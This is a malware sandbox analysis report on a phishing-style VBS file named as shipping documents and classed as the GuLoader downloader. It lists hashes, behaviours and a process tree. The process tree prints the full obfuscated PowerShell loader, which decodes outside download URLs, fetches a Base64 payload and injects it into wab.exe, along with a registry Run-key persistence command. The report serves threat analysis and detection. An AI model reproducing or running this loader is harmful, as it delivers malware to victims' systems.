Analysis
-
max time kernel
160s -
max time network
162s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
25/03/2024, 13:15
Static task
static1
Behavioral task
behavioral1
Sample
awb_shipping_documents_25_03_2024_000000000.vbs
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
awb_shipping_documents_25_03_2024_000000000.vbs
Resource
win10v2004-20240226-en
General
-
Target
awb_shipping_documents_25_03_2024_000000000.vbs
-
Size
237KB
-
MD5
937285e67679dcbd6d3a218cff5723e4
-
SHA1
73023fa293fc84f1db845a75a4be3c2337c8da4d
-
SHA256
d90f3ab705edef2a59cc39b6269f1a149f0f6e43e0aa4f128d05c1697726bcdb
-
SHA512
607ea5c0cf19a5776d60c15942c28b5e9433e52f72abad0b250d7abb72f98721210d328c6915051cd9b2fa215a938ed64eebb20de3dc6b9511f2a2fa3cb1b773
-
SSDEEP
6144:lyhQMLtOBxJrv5lttSP4KuK8jWwoipSRUiGT9rS2fTicm7jImE9uAI:ekVBDjI
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Blocklisted process makes network request 1 IoCs
flow pid Process 6 3768 WScript.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation WScript.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Epizoa213 = "%Overborgmesteren% -w 1 $Skrubbenes31=(Get-ItemProperty -Path 'HKCU:\\antimakassar\\').Nissehue183;%Overborgmesteren% ($Skrubbenes31)" reg.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
pid Process 3620 wab.exe 3620 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2648 powershell.exe 3620 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2648 set thread context of 3620 2648 powershell.exe 117 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry key 1 TTPs 1 IoCs
pid Process 1392 reg.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 1188 powershell.exe 1188 powershell.exe 1188 powershell.exe 2648 powershell.exe 2648 powershell.exe 2648 powershell.exe 2648 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2648 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1188 powershell.exe Token: SeDebugPrivilege 2648 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3620 wab.exe -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 3768 wrote to memory of 1188 3768 WScript.exe 101 PID 3768 wrote to memory of 1188 3768 WScript.exe 101 PID 1188 wrote to memory of 4512 1188 powershell.exe 106 PID 1188 wrote to memory of 4512 1188 powershell.exe 106 PID 1188 wrote to memory of 2648 1188 powershell.exe 107 PID 1188 wrote to memory of 2648 1188 powershell.exe 107 PID 1188 wrote to memory of 2648 1188 powershell.exe 107 PID 2648 wrote to memory of 4296 2648 powershell.exe 113 PID 2648 wrote to memory of 4296 2648 powershell.exe 113 PID 2648 wrote to memory of 4296 2648 powershell.exe 113 PID 2648 wrote to memory of 3620 2648 powershell.exe 117 PID 2648 wrote to memory of 3620 2648 powershell.exe 117 PID 2648 wrote to memory of 3620 2648 powershell.exe 117 PID 2648 wrote to memory of 3620 2648 powershell.exe 117 PID 2648 wrote to memory of 3620 2648 powershell.exe 117 PID 3620 wrote to memory of 184 3620 wab.exe 118 PID 3620 wrote to memory of 184 3620 wab.exe 118 PID 3620 wrote to memory of 184 3620 wab.exe 118 PID 184 wrote to memory of 1392 184 cmd.exe 120 PID 184 wrote to memory of 1392 184 cmd.exe 120 PID 184 wrote to memory of 1392 184 cmd.exe 120
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\awb_shipping_documents_25_03_2024_000000000.vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3768 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Patchy Corporis Vergaloo #>;<#sndagsskolers Paws Alexandrite Skit #>;New-Item -Path 'reservats:\Forfaldt' -Name 'Tiptipoldemoders' -ItemType 'file';<#Conto Perty Rkefjolss blencorn Vitrinernes #>;Function Tulipa ([String]$superofficiously){$Urikonografi = 2;For($Uri=1; $Uri -lt $superofficiously.Length-1; $Uri+=$Urikonografi){ $Urstrukturens = $superofficiously.Substring($Uri, $Forkhead); $Distingverende80=$Distingverende80+$Urstrukturens; }$Distingverende80;}$Forkhead = (cmd /c 'echo 1 && exit');if (Test-Path 'reservats:\Forfaldt\Tiptipoldemoders') {$Forkhead--};$Agillawood224=Tulipa ' i,eRxE ';$Outfound=Tulipa '.TSr a n,s fVeSr,rDi,nDg, ';$Monochordist = Tulipa 'A\Ss yDs wUoJw 6S4H\FW i.n,dHoFw,s PBo,wFePrPSFh,eTl l \Gv 1,. 0K\SpdoAwse,r.sKhue l.lB. e xVe. ';function Forefather ($Firetages){. ($Agillawood224) ($Firetages);}$Strangler=Tulipa '.hPtPtApR: /./V1 4.7D.r7P8.. 1 0h3U.A2 5 0R/ S pUr r eUr eNg e lo. pRsPdB>shGtStOp.: /P/I8.5,.F2 0r9 . 1S7,6M.O4.6,/GSTpCr.r e rSe g,eSl .Sp s.dS ';$Formbrndselsfabrikken236=$Strangler.split([char]62);$Strangler=$Formbrndselsfabrikken236[0];Forefather (Tulipa ' $CgPlSo.bDaBld:BF y sHi,oJt eSrBaGp,eSu.tEsDk oWlRe r =K$AeRnUv.: wTiUntdFiEr ') ;Forefather (Tulipa ' $ g l.opbTa l.:BL,eHvHiSnRe r = $ F yAsHi oRtne rSa,pLeFuPt s kUoMl eFr.+ $AM o n,o cDh,o r dLi s tN ') ;Forefather (Tulipa 'T$ gUlNo b afl :RHPaSa nAd.vArSkNe tEs .=A ,( (Kg wAm iS w iDnU3 2,_,p r.o.c eMs s. -,F. P,rSoZcNeGs s I d =D$,{PP IKD,} )A. C o m m aHn d.L,i n e.). .- s,p lMi t. b[.cPh aJr ] 3B4E ');Forefather (Tulipa ' $ g.lFoCb.a,lg: R dUtA1I8.5D .=, T$AH.aSa n d v r.k e t s [ $ H,aOaSn dLvGrBkEeTt s .FcBo,u.nEtV-M2S] ');Forefather (Tulipa 'A$tgPlRo b,a.l.: OHvhe.rVb eAf oAl k nMiSnSg.eSn,s = (,TOe s t - P,aTt hB .$ L.eVvUifnBe rM) F- AAn dT T(.[ I nst PDtAr ] :P: sKiKzOe M- eEqF 8E) ') ;if ($Overbefolkningens) {& $Leviner $Rdt185;} else {;$Genealogists=Tulipa 'A$ g,l,oTbNa l : M.iGn,i,f iseTdJ ,= ,SAt.a r tS-PB iLtAseTarSa nRs f eNr. -NSToFu r,c e, G$ISOt r a n g,lUe r. -DDSeBs t iknSa tvi.oLn, O$ FEyMs i o t.e,rRaep.eOuPtSs.k,o.l.e.rB ';Forefather (Tulipa '.$Ag lVo b.aTlM: FLySsfiToIt e,rMaFp,eSu.tOsBkRoklbeMr = $,eonKv :Sa pCp d aSt aE ') ;Forefather (Tulipa '.I mMpOowrOtT-.M o dTuAl.e, BEiStEs,T rMa n s f e.rG ') ;$Fysioterapeutskoler=$Fysioterapeutskoler+'\Judicial.Ara' ;Forefather (Tulipa ',$,g l.o b,a lA:ICThDoUl eSlTiItAh.odt.o.m yn= (ST,e sEtN-,P.aGt hS ,$VF,ySsUi,oRt,eAr a.pVeSuNtesTkBo,l e r ), ') ;while (-not $Cholelithotomy) {Forefather (Tulipa ' IAf ( $TM i.n.i fPi eBdK.DJ opbAS.t.aDt ei -Re qH ,$.OWu tNf o u,n d.)F K{YS.tPa,r.tc- SClDeBeVp M1C} etlAs.eN{SSOt a,r tf-NS l eFe pB 1S;TFSoSrBe f aPt h,e.rP ,$.GBeEn.e a lKo g i sot sA}D ');Forefather (Tulipa 'F$Eg.lHokb.a lP:aC hHo,l eMl iVtKhSo tSoRm y = (,T,e s t.-.P aNt,hM K$ FNy,s i ovt eTr.a.pCe u t s k oBlKe r )S ') ;$Strangler=$Formbrndselsfabrikken236[$Precompiler++%$Formbrndselsfabrikken236.count];}Forefather (Tulipa '.$Ggal o,bSaOlA:UP aDsFs.a gHe.r eCrPnRe.sN t=D TGNeAtT-BC o nutUeQn.tD D$,FAy,s iSo.t,e r alpFeRuEtSs.k oIl,eNr ');Forefather (Tulipa 'K$Hg lDo.bBaPlN:DD.uGr o mOeLtHe,rRs = [.S yVsStPe m,. C,o nBv e rDt.]D:R: F ruo,m BPaKs e,6O4DSPtLrSiNnFg (J$ P aGsTs a.gteUr eBr.n e s,) ');Forefather (Tulipa 'I$,g lWo bBaOl.:,V.aSlCm.u.eB S=f S[.SRyFs t eUmB.,TSe x tK. E nFcuo,d iHnKg ].:P:UAPSTC.IVIS.,G.eSt.SFtTr i,n.g (.$ DHu,r.o.m eHtReDrKs )H ');Forefather (Tulipa ' $ g l.o,bPaAl,:SCueNp.h a.l o,cHhCoSr dEaS=A$,V a.lEm,uSe,.Ps,u b,s tUrHiFnKg (.2E9R1I1M8L6S, 2 3K4S0E0C)S ');Forefather $Cephalochorda;};;"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1188 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 1 && exit"3⤵PID:4512
-
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Patchy Corporis Vergaloo #>;<#sndagsskolers Paws Alexandrite Skit #>;New-Item -Path 'reservats:\Forfaldt' -Name 'Tiptipoldemoders' -ItemType 'file';<#Conto Perty Rkefjolss blencorn Vitrinernes #>;Function Tulipa ([String]$superofficiously){$Urikonografi = 2;For($Uri=1; $Uri -lt $superofficiously.Length-1; $Uri+=$Urikonografi){ $Urstrukturens = $superofficiously.Substring($Uri, $Forkhead); $Distingverende80=$Distingverende80+$Urstrukturens; }$Distingverende80;}$Forkhead = (cmd /c 'echo 1 && exit');if (Test-Path 'reservats:\Forfaldt\Tiptipoldemoders') {$Forkhead--};$Agillawood224=Tulipa ' i,eRxE ';$Outfound=Tulipa '.TSr a n,s fVeSr,rDi,nDg, ';$Monochordist = Tulipa 'A\Ss yDs wUoJw 6S4H\FW i.n,dHoFw,s PBo,wFePrPSFh,eTl l \Gv 1,. 0K\SpdoAwse,r.sKhue l.lB. e xVe. ';function Forefather ($Firetages){. ($Agillawood224) ($Firetages);}$Strangler=Tulipa '.hPtPtApR: /./V1 4.7D.r7P8.. 1 0h3U.A2 5 0R/ S pUr r eUr eNg e lo. pRsPdB>shGtStOp.: /P/I8.5,.F2 0r9 . 1S7,6M.O4.6,/GSTpCr.r e rSe g,eSl .Sp s.dS ';$Formbrndselsfabrikken236=$Strangler.split([char]62);$Strangler=$Formbrndselsfabrikken236[0];Forefather (Tulipa ' $CgPlSo.bDaBld:BF y sHi,oJt eSrBaGp,eSu.tEsDk oWlRe r =K$AeRnUv.: wTiUntdFiEr ') ;Forefather (Tulipa ' $ g l.opbTa l.:BL,eHvHiSnRe r = $ F yAsHi oRtne rSa,pLeFuPt s kUoMl eFr.+ $AM o n,o cDh,o r dLi s tN ') ;Forefather (Tulipa 'T$ gUlNo b afl :RHPaSa nAd.vArSkNe tEs .=A ,( (Kg wAm iS w iDnU3 2,_,p r.o.c eMs s. -,F. P,rSoZcNeGs s I d =D$,{PP IKD,} )A. C o m m aHn d.L,i n e.). .- s,p lMi t. b[.cPh aJr ] 3B4E ');Forefather (Tulipa ' $ g.lFoCb.a,lg: R dUtA1I8.5D .=, T$AH.aSa n d v r.k e t s [ $ H,aOaSn dLvGrBkEeTt s .FcBo,u.nEtV-M2S] ');Forefather (Tulipa 'A$tgPlRo b,a.l.: OHvhe.rVb eAf oAl k nMiSnSg.eSn,s = (,TOe s t - P,aTt hB .$ L.eVvUifnBe rM) F- AAn dT T(.[ I nst PDtAr ] :P: sKiKzOe M- eEqF 8E) ') ;if ($Overbefolkningens) {& $Leviner $Rdt185;} else {;$Genealogists=Tulipa 'A$ g,l,oTbNa l : M.iGn,i,f iseTdJ ,= ,SAt.a r tS-PB iLtAseTarSa nRs f eNr. -NSToFu r,c e, G$ISOt r a n g,lUe r. -DDSeBs t iknSa tvi.oLn, O$ FEyMs i o t.e,rRaep.eOuPtSs.k,o.l.e.rB ';Forefather (Tulipa '.$Ag lVo b.aTlM: FLySsfiToIt e,rMaFp,eSu.tOsBkRoklbeMr = $,eonKv :Sa pCp d aSt aE ') ;Forefather (Tulipa '.I mMpOowrOtT-.M o dTuAl.e, BEiStEs,T rMa n s f e.rG ') ;$Fysioterapeutskoler=$Fysioterapeutskoler+'\Judicial.Ara' ;Forefather (Tulipa ',$,g l.o b,a lA:ICThDoUl eSlTiItAh.odt.o.m yn= (ST,e sEtN-,P.aGt hS ,$VF,ySsUi,oRt,eAr a.pVeSuNtesTkBo,l e r ), ') ;while (-not $Cholelithotomy) {Forefather (Tulipa ' IAf ( $TM i.n.i fPi eBdK.DJ opbAS.t.aDt ei -Re qH ,$.OWu tNf o u,n d.)F K{YS.tPa,r.tc- SClDeBeVp M1C} etlAs.eN{SSOt a,r tf-NS l eFe pB 1S;TFSoSrBe f aPt h,e.rP ,$.GBeEn.e a lKo g i sot sA}D ');Forefather (Tulipa 'F$Eg.lHokb.a lP:aC hHo,l eMl iVtKhSo tSoRm y = (,T,e s t.-.P aNt,hM K$ FNy,s i ovt eTr.a.pCe u t s k oBlKe r )S ') ;$Strangler=$Formbrndselsfabrikken236[$Precompiler++%$Formbrndselsfabrikken236.count];}Forefather (Tulipa '.$Ggal o,bSaOlA:UP aDsFs.a gHe.r eCrPnRe.sN t=D TGNeAtT-BC o nutUeQn.tD D$,FAy,s iSo.t,e r alpFeRuEtSs.k oIl,eNr ');Forefather (Tulipa 'K$Hg lDo.bBaPlN:DD.uGr o mOeLtHe,rRs = [.S yVsStPe m,. C,o nBv e rDt.]D:R: F ruo,m BPaKs e,6O4DSPtLrSiNnFg (J$ P aGsTs a.gteUr eBr.n e s,) ');Forefather (Tulipa 'I$,g lWo bBaOl.:,V.aSlCm.u.eB S=f S[.SRyFs t eUmB.,TSe x tK. E nFcuo,d iHnKg ].:P:UAPSTC.IVIS.,G.eSt.SFtTr i,n.g (.$ DHu,r.o.m eHtReDrKs )H ');Forefather (Tulipa ' $ g l.o,bPaAl,:SCueNp.h a.l o,cHhCoSr dEaS=A$,V a.lEm,uSe,.Ps,u b,s tUrHiFnKg (.2E9R1I1M8L6S, 2 3K4S0E0C)S ');Forefather $Cephalochorda;};;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2648 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 1 && exit"4⤵PID:4296
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3620 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Epizoa213" /t REG_EXPAND_SZ /d "%Overborgmesteren% -w 1 $Skrubbenes31=(Get-ItemProperty -Path 'HKCU:\antimakassar\').Nissehue183;%Overborgmesteren% ($Skrubbenes31)"5⤵
- Suspicious use of WriteProcessMemory
PID:184 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Epizoa213" /t REG_EXPAND_SZ /d "%Overborgmesteren% -w 1 $Skrubbenes31=(Get-ItemProperty -Path 'HKCU:\antimakassar\').Nissehue183;%Overborgmesteren% ($Skrubbenes31)"6⤵
- Adds Run key to start application
- Modifies registry key
PID:1392
-
-
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4068 --field-trial-handle=3088,i,14310325015283915034,7660943942870463106,262144 --variations-seed-version /prefetch:81⤵PID:3836
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82